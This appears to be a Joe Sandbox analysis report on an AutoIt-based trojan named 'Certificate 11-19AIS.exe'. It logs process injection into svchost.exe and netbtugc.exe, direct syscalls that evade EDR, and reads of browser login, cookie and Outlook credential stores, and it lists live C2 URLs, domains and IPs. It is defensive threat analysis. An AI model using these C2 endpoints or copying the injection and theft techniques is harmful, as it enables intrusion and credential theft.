Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtDeviceIoControlFile: Direct from: 0x76F12AEC
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtSetInformationThread: Direct from: 0x76F063F9
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtOpenSection: Direct from: 0x76F12E0C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtMapViewOfSection: Direct from: 0x76F12D1C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtResumeThread: Direct from: 0x76F136AC
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtCreateMutant: Direct from: 0x76F135CC
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtWriteVirtualMemory: Direct from: 0x76F12E3C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtNotifyChangeKey: Direct from: 0x76F13C2C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtProtectVirtualMemory: Direct from: 0x76F07B2E
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtProtectVirtualMemory: Direct from: 0x76F12F9C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtSetInformationProcess: Direct from: 0x76F12C5C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtOpenKeyEx: Direct from: 0x76F12B9C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtQueryInformationProcess: Direct from: 0x76F12C26
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtResumeThread: Direct from: 0x76F12FBC
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtDelayExecution: Direct from: 0x76F12DDC
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtReadFile: Direct from: 0x76F12ADC
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtQuerySystemInformation: Direct from: 0x76F12DFC
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtAllocateVirtualMemory: Direct from: 0x76F12BFC
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 4688
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 29A9008
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007EB106 LogonUserW
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007B3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007F411C SendInput,keybd_event
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007F74E7 mouse_event
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-19AIS.exe"
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007EA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007F71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: Certificate 11-19AIS.exe, auecFLppjswMvwfJiAu.exe, 00000003.00000002.3778292881.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000000.1382799109.0000000000F20000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: auecFLppjswMvwfJiAu.exe, 00000003.00000002.3778292881.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000000.1382799109.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3780255851.0000000001A71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: Certificate 11-19AIS.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: auecFLppjswMvwfJiAu.exe, 00000003.00000002.3778292881.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000000.1382799109.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3780255851.0000000001A71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: auecFLppjswMvwfJiAu.exe, 00000003.00000002.3778292881.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000000.1382799109.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3780255851.0000000001A71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: yProgram Manager
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007D65C4 cpuid
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_0080091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_0082B340 GetUserNameW
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007E1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007CDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Certificate 11-19AIS.exe | Binary or memory string: WIN_81
Source: Certificate 11-19AIS.exe | Binary or memory string: WIN_XP
Source: Certificate 11-19AIS.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: Certificate 11-19AIS.exe | Binary or memory string: WIN_XPe
Source: Certificate 11-19AIS.exe | Binary or memory string: WIN_VISTA
Source: Certificate 11-19AIS.exe | Binary or memory string: WIN_7
Source: Certificate 11-19AIS.exe | Binary or memory string: WIN_8

            Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_00808C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_0080923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (a leading number in a cell is the count of matched signatures for that technique; cells without a number were not matched):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (ID: 1562318, Sample: Certificate 11-19AIS.exe, Startdate: 25/11/2024, Architecture: WINDOWS, Score: 100)

Start node: www.joyesi.xyz, www.techchains.info, 16 other IPs or domains
  Signatures at start: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures
  www.joyesi.xyz: Performs DNS queries to domains with low reputation
Certificate 11-19AIS.exe (started, 2 created files)
  Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
  -> svchost.exe (started)
     Signatures: Maps a DLL or memory area into another process
     -> auecFLppjswMvwfJiAu.exe (injected)
        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        -> netbtugc.exe (started, 13 created files)
           Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
           -> auecFLppjswMvwfJiAu.exe (injected)
              Network: www.rssnewscast.com 91.195.240.94, ports 49984, 49985, 49986 (SEDO-ASDE, Germany); elettrosistemista.zip 195.110.124.133, ports 49992, 49993, 49994 (REGISTER-ASIT, Italy); 5 other IPs or domains
              Signatures: Found direct / indirect Syscall (likely to bypass EDR)
           -> firefox.exe (started)

Source | Detection | Scanner | Label | Link
Certificate 11-19AIS.exe | 71% | ReversingLabs | Win32.Trojan.AutoitInject
Certificate 11-19AIS.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.empowermedeco.com/fo8o/?zh=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&HpnH2=lZrlsdK8B4Q | 0% | Avira URL Cloud | safe
http://www.rssnewscast.com/fo8o/?zh=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&HpnH2=lZrlsdK8B4Q | 100% | Avira URL Cloud | malware
http://www.rssnewscast.com/fo8o/ | 100% | Avira URL Cloud | malware
http://www.elettrosistemista.zip/fo8o/ | 100% | Avira URL Cloud | malware
http://www.goldenjade-travel.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4= | 100% | Avira URL Cloud | malware
http://www.elettrosistemista.zip/fo8o/?HpnH2=lZrlsdK8B4Q&zh=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE= | 100% | Avira URL Cloud | malware
http://www.magmadokum.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk= | 0% | Avira URL Cloud | safe
http://www.empowermedeco.com/fo8o/ | 0% | Avira URL Cloud | safe
http://www.magmadokum.com/fo8o/ | 0% | Avira URL Cloud | safe
http://www.3xfootball.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c= | 0% | Avira URL Cloud | safe
http://www.goldenjade-travel.com/fo8o/ | 100% | Avira URL Cloud | malware
https://www.empowermedeco.com/fo8o/?zh=mxnR | 0% | Avira URL Cloud | safe
Name | Malicious | Antivirus Detection | Reputation
http://www.elettrosistemista.zip/fo8o/?HpnH2=lZrlsdK8B4Q&zh=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE= | true | Avira URL Cloud: malware | unknown
http://www.empowermedeco.com/fo8o/ | true | Avira URL Cloud: safe | unknown
http://www.rssnewscast.com/fo8o/?zh=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&HpnH2=lZrlsdK8B4Q | true | Avira URL Cloud: malware | unknown
http://www.elettrosistemista.zip/fo8o/ | true | Avira URL Cloud: malware | unknown
http://www.empowermedeco.com/fo8o/?zh=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&HpnH2=lZrlsdK8B4Q | true | Avira URL Cloud: safe | unknown
http://www.magmadokum.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk= | true | Avira URL Cloud: safe | unknown
http://www.magmadokum.com/fo8o/ | true | Avira URL Cloud: safe | unknown
http://www.goldenjade-travel.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4= | true | Avira URL Cloud: malware | unknown
http://www.3xfootball.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c= | true | Avira URL Cloud: safe | unknown
http://www.rssnewscast.com/fo8o/ | true | Avira URL Cloud: malware | unknown
http://www.goldenjade-travel.com/fo8o/ | true | Avira URL Cloud: malware | unknown
http://www.techchains.info/fo8o/ | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.empowermedeco.com | auecFLppjswMvwfJiAu.exe, 00000006.00000002.3783040260.0000000005804000.00000040.80000000.00040000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_ | netbtugc.exe, 00000004.00000002.3784325817.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3782139985.000000000416E000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000003F3E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://www.sedo.com/services/parking.php3 | auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000003F3E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://codepen.io/uzcho_/pens/popular/?grid_type=list | netbtugc.exe, 00000004.00000002.3782139985.0000000004492000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000004262000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://codepen.io/uzcho_/pen/eYdmdXw.css | netbtugc.exe, 00000004.00000002.3782139985.0000000004492000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000004262000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.empowermedeco.com/fo8o/?zh=mxnR | netbtugc.exe, 00000004.00000002.3782139985.0000000004ADA000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.00000000048AA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
91.195.240.94 | www.rssnewscast.com | Germany | 47846 | SEDO-ASDE | false
154.215.72.110 | www.3xfootball.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | false
195.110.124.133 | elettrosistemista.zip | Italy | 39729 | REGISTER-ASIT | false
116.50.37.244 | www.goldenjade-travel.com | Taiwan; Republic of China (ROC) | 18046 | DONGFONG-TWDongFongTechnologyCoLtdTW | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
66.29.149.46 | www.techchains.info | United States | 19538 | ADVANTAGECOMUS | false
217.196.55.202 | empowermedeco.com | Norway | 29300 | AS-DIRECTCONNECTNO | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562318
Start date and time: 2024-11-25 13:56:02 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Certificate 11-19AIS.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@14/7
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 53
• Number of non-executed functions: 290
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
